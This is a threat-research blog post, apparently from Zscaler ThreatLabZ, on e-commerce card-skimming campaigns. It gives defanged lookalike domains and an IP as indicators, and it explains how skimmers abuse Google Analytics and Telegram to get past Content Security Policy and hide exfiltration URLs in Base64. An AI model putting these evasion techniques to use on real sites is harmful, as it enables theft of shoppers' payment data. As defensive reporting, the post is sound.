Skimmer groups are growing rapidly and targeting various e-commerce platforms using a variety of ways to remain undetected. The Zscaler ThreatLabZ research team has been tracking these skimmer groups and monitoring the techniques they're using.
Figure 1: Hits on compromised sites over 90 days
Historically, the Magento platform has been the most highly targeted in skimmer attacks. This trend continues with significant spikes in other e-commerce platforms as well.
Figure 2: Different e-commerce platforms targeted during the past two months.
Newly registered domains (NRDs) in skimmer attacks
Figure 3: Trend for newly registered domains lexically close to legitimate services.
URL categorization of targeted websites
Websites in the shopping category are the most common targets for skimmer attacks, but other URL categories have also fallen victim to these attacks, as shown in the following chart:
Figure 4: URL categories of impacted sites
Abusing legitimate communication and analytics services in skimmer attacks
Starting last year, we've seen skimmer groups abusing legitimate communication and analytics services, such as Telegram and Google analytics, for data exfiltration. Some of these skimmer techniques can be defeated by configuring Content Security Policy (CSP). CSP is an added layer of web security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to distribution of malware.
By configuring CSP, web admins can specify domains that should be considered valid sources for scripts—though such specifications can often be bypassed by attackers abusing the Google Analytics API, which is used legitimately by a large number of websites.
ThreatLabZ observed a significant spike during February and March 2021 in such attacks, where legitimate communication and analytics services are abused, but they have trailed off in recent weeks.
Figure 5: Hits of skimmer groups abusing legitimate services over 90 days.
Recent skimmer activity
Recent skimmer attacks have heavily leveraged NRDs for malicious script injection and data exfiltration, as well as the use of compromised third-party scripts or CDNs. Below are two examples of recent skimmer attacks using NRDs and CDNs to serve content to specific websites.
Case 1: In one of the skimmer attacks, we observed two NRDs involved—one for injecting malicious skimmer code and the other for data exfiltration. These domains are lexically similar to the keywords jquery and CDN to help attacks remain undetected in legitimate traffic.
Skimmer Domain: jquery-ui[.]net
Creation Date: 2021-04-18
Data Exfiltration Domain: cdn-cgi[.]net
Creation Date: 2021-04-11
Figure 6: Obfuscated skimmer script.
The skimmer script has a Base64-encoded fake payment page and skimmed data is sent to the attacker-controlled domain.
Figure 7: Data exfiltration domain and Base64-encoded fake payment page.
Currently, both of these NRDs are resolving to the same IP 34.125.186[.]248, which hosts multiple (possible) skimmer domains lexically close to legitimate services.
Figure 8: Multiple possible skimmer domains resolving to the same IP address. (Source: RiskIQ)
In the recent past, these domains resolved to the following IP addresses, each of which hosted newly registered domains lexically close to legitimate domains and possibly connected to the skimmer attacks.
Figure 9: Suspicious IP addresses related to these domains. (Source: RiskIQ)
During our analysis of the above-mentioned IP addresses and domains, we observed that domain ajaxtracker[.]com was resolving to IP address 34.125.186[.]248 from April 26, 2021, to April 29, 2021, and during this time it was connected to the Raccoon Stealer.
Figure 10: Malicious skimmer script.
Figure 11: Function to grab all the inputs provided by the victim.
The Default_send function is responsible for collecting the URL of the infected page and grabbing all the inputs provided by the victim who is shopping on the compromised website.
Figure 12: Function to send victim’s card details to attacker.
Once the script has collected the data, it will call the SendData function, which has the target URL to which the collected data will be uploaded. The URL is stored in Base64-encoded format in the SendData function, as displayed below.
Figure 13: Base64 encoded data exfiltration domain.
If we decode the Base64 URL, we find that the data was being exfiltrated to the malicious domain google-sanek[.]com.
Skimmer groups continue to infect e-commerce sites in large numbers and improve techniques to remain undetected. The use of newly registered domains lexically close to legitimate domains or services helps attackers evade reputation-based engines, as their domains are too new to have a low rating. It is always recommended for buyers to use only known and legitimate e-commerce stores. Zscaler ThreatLabZ actively tracks malicious campaigns and protects customers from skimming and other types of data-stealing attacks.